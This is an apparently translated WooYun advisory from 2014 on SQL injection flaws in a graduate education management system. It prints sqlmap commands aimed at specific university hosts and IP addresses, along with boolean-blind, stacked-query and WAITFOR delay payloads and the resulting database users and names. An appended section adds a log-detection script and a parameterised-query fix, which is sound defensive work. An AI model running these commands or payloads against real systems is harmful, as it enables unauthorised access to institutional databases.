
Vulnerability Summary

Defect ID: wooyun-2014-060561

Title: Multiple generic SQL injection vulnerabilities in a certain education management information system

Related vendor: CNCERT (cncert国家互联网应急中心, National Internet Emergency Center)

Author: Mr.leo

Submitted: 2014-05-15 15:06

Fixed: 2014-08-13 15:08

Disclosed: 2014-08-13 15:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2014-05-15: Details sent to the vendor, awaiting vendor handling
2014-05-18: Vendor confirmed; details disclosed to the vendor only
2014-05-21: Details opened to third-party security partners
2014-07-12: Details opened to core white hats and domain experts
2014-07-22: Details opened to regular white hats
2014-08-01: Details opened to intern white hats
2014-08-13: Details disclosed to the public

Brief description:

Multiple generic SQL injection vulnerabilities in a certain education management information system.

Detailed description:

The Graduate Education Management Information System developed by Dalian Tuopu Weiye Technology Co., Ltd. (大连拓扑伟业科技有限公司); database table information can be read through the injection.
1. The ID parameter is not filtered, leading to SQL injection.
Three cases (sqlmap commands and output as run by the author):
Sqlmap -u "http://grsmis.sjzu.edu.cn/public/tutorshow.aspx?ID=00147&spec=6" --dbs --current-user --current-db
Sqlmap -u "http://202.118.83.94:85/public/tutorshow.aspx?ID=19851006&spec=59" --dbs --current-user --current-db
Sqlmap -u "http://202.199.155.6/dlugdmis/public/tutorshow.aspx?ID=040040&spec=6" --dbs --current-user --current-db
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=00147' AND 2469=2469 AND 'JOSw'='JOSw&spec=6
---
[17:06:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS
back-end DBMS: Microsoft SQL Server 2005
[17:06:03] [INFO] fetching current user
[17:06:03] [INFO] resumed: gsadmin
current user: 'gsadmin'
[17:06:03] [INFO] fetching current database
[17:06:03] [INFO] resumed: syjzgsDB
current database: 'syjzgsDB'
[17:06:03] [INFO] fetching database names
[17:06:03] [INFO] fetching number of databases
[17:06:03] [INFO] resumed: 6
[17:06:03] [INFO] resumed: master
[17:06:03] [INFO] resumed: model
[17:06:03] [INFO] resumed: msdb
[17:06:03] [INFO] resumed: syjzgsDB
[17:06:03] [INFO] resumed: temp
[17:06:03] [INFO] resumed: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] syjzgsDB
[*] temp
[*] tempdb

Instance 2:
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
current user: 'tpwy'
current database: 'tpwymis20100628'
available databases [18]:
[*] dlmuTest100603
[*] dmumis02
[*] dmumis0719
[*] dmumis20100511
[*] dxHelp
[*] HaTeam_Dd
[*] masper
[*] MisBak
[*] model
[*] msdb
[*] newmar
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] TPWY
[*] tpwymis20100628
[*] WYMIS
Instance 3:
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=040040 AND 8570=8570&spec=6
---
[15:19:17] [INFO] testing MySQL
[15:19:26] [WARNING] the back-end DBMS is not MySQL
[15:19:26] [INFO] testing Oracle
[15:19:35] [WARNING] the back-end DBMS is not Oracle
[15:19:35] [INFO] testing PostgreSQL
[15:19:44] [WARNING] the back-end DBMS is not PostgreSQL
[15:19:44] [INFO] testing Microsoft SQL Server
[15:19:54] [INFO] confirming Microsoft SQL Server
[15:20:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:20:23] [INFO] fetching current user
[15:20:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:20:23] [INFO] retrieved: gsmis
current user: 'gsmis'
[15:26:56] [INFO] fetching current database
[15:26:56] [INFO] retrieved: dlu100318
current database: 'dlu100318'
[15:37:58] [INFO] fetching database names
[15:37:58] [INFO] fetching number of databases
[15:37:58] [INFO] retrieved: 7
[15:39:06] [INFO] retrieved: dlu100318
[15:50:06] [INFO] retrieved: master
[15:52:42] [INFO] retrieved: model
[15:53:02] [INFO] retrieved: msdb
[15:53:17] [INFO] retrieved: ReportServer
[15:53:56] [INFO] retrieved: ReportServerTempDB
[15:54:55] [INFO] retrieved: tempdb
available databases [7]:
[*] dlu100318
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
2. The ID parameter is not filtered, leading to SQL injection (the three instances given here are identical to those listed under item 1).
3. The id parameter (subjectspeci.aspx) is not filtered, leading to SQL injection; two instances:
http://grsmis.sjzu.edu.cn/public/subjectspeci.aspx?id=71&gl=2
http://202.118.83.94:85/public/subjectspeci.aspx?id=71&gl=2
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=71 AND 5561=5561&gl=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=71; WAITFOR DELAY '0:0:5';--&gl=2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=71 WAITFOR DELAY '0:0:5'--&gl=2
---
[18:20:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[18:20:14] [INFO] fetching current user
[18:20:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:20:14] [INFO] retrieved:
[18:20:15] [WARNING] reflective value(s) found and filtering out
gsadmin
current user: 'gsadmin'
[18:20:46] [INFO] fetching current database
[18:20:46] [INFO] retrieved: syjzgsDB
current database: 'syjzgsDB'
[18:21:19] [INFO] fetching database names
[18:21:19] [INFO] fetching number of databases
[18:21:19] [INFO] retrieved: 6
[18:21:22] [INFO] retrieved: master
[18:21:50] [INFO] retrieved: model
[18:22:12] [INFO] retrieved: msdb
[18:22:35] [INFO] retrieved: syjzgsDB
[18:23:19] [INFO] retrieved: temp
[18:23:44] [INFO] retrieved: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] syjzgsDB
[*] temp
[*] tempdb

Instance 2:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=71 AND 2894=2894&gl=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=71; WAITFOR DELAY '0:0:5';--&gl=2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=71 WAITFOR DELAY '0:0:5'--&gl=2
---
[18:21:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[18:21:05] [INFO] fetching current user
[18:21:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:21:05] [INFO] retrieved:
[18:21:06] [WARNING] reflective value(s) found and filtering out
tpwy
current user: 'tpwy'
[18:21:20] [INFO] fetching current database
[18:21:20] [INFO] retrieved: tpwymis20100628
current database: 'tpwymis20100628'
[18:22:07] [INFO] fetching database names
[18:22:07] [INFO] fetching number of databases
[18:22:07] [INFO] retrieved: 18
[18:22:11] [INFO] retrieved: dlmuTest100603
[18:23:02] [INFO] retrieved: dmumis02
[18:23:33] [INFO] retrieved: dmumis0719
[18:24:13] [INFO] retrieved: dmumis20100511
[18:25:12] [INFO] retrieved: bxHelp
[18:25:59] [INFO] retrieved: HaTeam_Dd
[18:26:38] [INFO] retrieved: master
[18:27:02] [INFO] retrieved: MisBak
[18:27:26] [INFO] retrieved: model
[18:27:47] [INFO] retrieved: msdb
[18:28:04] [INFO] retrieved: newmar
[18:28:29] [INFO] retrieved: ReportServer
[18:29:15] [INFO] retrieved: ReportServerTempDB
[18:30:23] [INFO] retrieved: tempdb
[18:30:49] [INFO] retrieved: test
[18:31:07] [INFO] retrieved: TPWY
[18:31:25] [INFO] retrieved: tpwymis20100628
[18:32:28] [INFO] retrieved: WYMIS
available databases [18]:
[*] bxHelp
[*] dlmuTest100603
[*] dmumis02
[*] dmumis0719
[*] dmumis20100511
[*] HaTeam_Dd
[*] master
[*] MisBak
[*] model
[*] msdb
[*] newmar
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] TPWY
[*] tpwymis20100628
[*] WYMIS
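The sqlmap output above shows three payload shapes on the ID/id parameters: a boolean tautology (AND n=n), a stacked query (; WAITFOR ...) and a WAITFOR DELAY time-based probe. As an added example (not part of the original report), the following detection logic flags those shapes in IIS W3C log lines; the log excerpt, IP addresses and field order are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload shapes reported by sqlmap on this page:
# boolean tautology (AND n=n), stacked query (; WAITFOR ...) and WAITFOR DELAY.
RULES = {
    "boolean-tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "stacked-query": re.compile(r";\s*(WAITFOR|SELECT|EXEC|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "time-delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
}

# Constructed IIS W3C log excerpt (assumed field order; documentation-range IPs).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2014-05-15 07:05:58 192.0.2.10 GET /public/tutorshow.aspx ID=00147&spec=6 80 - 198.51.100.7 Mozilla/5.0 200
2014-05-15 07:06:03 192.0.2.10 GET /public/tutorshow.aspx ID=00147%27+AND+2469%3D2469+AND+%27JOSw%27%3D%27JOSw&spec=6 80 - 198.51.100.7 sqlmap/1.0 200
2014-05-15 10:20:14 192.0.2.10 GET /public/subjectspeci.aspx id=71%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--&gl=2 80 - 198.51.100.7 sqlmap/1.0 200
2014-05-15 10:20:20 192.0.2.10 GET /public/subjectspeci.aspx id=71+WAITFOR+DELAY+%270%3A0%3A5%27--&gl=2 80 - 198.51.100.7 sqlmap/1.0 200
"""

def parse_iis_line(line):
    """Return the fields we need from one W3C log line, or None for header/short lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 6:
        return None
    query = "" if parts[5] == "-" else parts[5]
    return {"time": parts[0] + " " + parts[1], "method": parts[3], "path": parts[4], "query": query}

def scan_query(query):
    """Decode each parameter ourselves, splitting only on '&' so a ';' inside a
    stacked-query payload stays intact, and return (param, rule) for each match."""
    hits = []
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.append((unquote_plus(name), rule))
    return hits

def scan_iis_lines(lines):
    """Run the rules over a log and return one alert per (request, parameter, rule)."""
    alerts = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        for param, rule in scan_query(rec["query"]):
            alerts.append({"time": rec["time"], "path": rec["path"], "param": param, "rule": rule})
    return alerts

if __name__ == "__main__":
    for alert in scan_iis_lines(SAMPLE_LOG.splitlines()):
        print(alert)
```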

Proof of vulnerability:

Already demonstrated above.

Fix recommendation:

Filter (validate) the multiple affected parameters.

Copyright notice: please credit the source when reposting: Mr.leo@WooYun
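As an added illustration of the fix (not code from the report, the vendor or the author), the unfiltered string-concatenation pattern is shown beside a parameterised query with a numeric allow-list check, the standard mitigation for this bug class. The SQLite stand-in table for tutorshow.aspx (ID and spec) is an assumption; the probe is the report's own boolean-blind payload, and the point shown is that concatenation answers a true and a false probe differently (the blind oracle sqlmap used), while the bound parameter treats the probe as a literal ID.

```python
import sqlite3

# Assumed stand-in for the tutor table behind tutorshow.aspx?ID=...&spec=...
# (schema and rows are constructed for this example).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tutor(id TEXT, spec INTEGER, name TEXT, phone TEXT);
        INSERT INTO tutor VALUES ('00147', 6, 'Tutor A', 'private-1');
        INSERT INTO tutor VALUES ('00148', 6, 'Tutor B', 'private-2');
        INSERT INTO tutor VALUES ('00149', 7, 'Tutor C', 'private-3');
    """)
    return db

def tutor_show_vulnerable(db, tutor_id, spec):
    """Unfiltered concatenation: both query-string values become part of the SQL text."""
    sql = "SELECT name FROM tutor WHERE id='" + tutor_id + "' AND spec=" + spec + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def tutor_show_fixed(db, tutor_id, spec):
    """Bound parameters plus an allow-list check on the numeric field: the driver sends
    tutor_id as data, so quotes and AND clauses inside it never reach the parser as SQL."""
    if not spec.isdigit():
        raise ValueError("spec must be a non-negative integer")
    sql = "SELECT name FROM tutor WHERE id=? AND spec=? ORDER BY id"
    return [row[0] for row in db.execute(sql, (tutor_id, int(spec)))]

# The report's boolean-blind probe and its false twin: a blind oracle exists when
# the handler returns different results for the two.
TRUE_PROBE = "00147' AND 2469=2469 AND 'JOSw'='JOSw"
FALSE_PROBE = "00147' AND 2469=2470 AND 'JOSw'='JOSw"

def has_boolean_oracle(handler, db):
    """True when the handler's answer depends on the injected condition."""
    return handler(db, TRUE_PROBE, "6") != handler(db, FALSE_PROBE, "6")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks an oracle:", has_boolean_oracle(tutor_show_vulnerable, db))
    print("fixed handler leaks an oracle:     ", has_boolean_oracle(tutor_show_fixed, db))
```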


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2014-05-18 15:59

Vendor reply:

CNVD has confirmed and reproduced the described situation; CNVD will contact the software vendor, Dalian Tuopu Weiye Technology Co., Ltd. (大连拓扑伟业科技有限公司), through public channels for handling.

Latest status:

None yet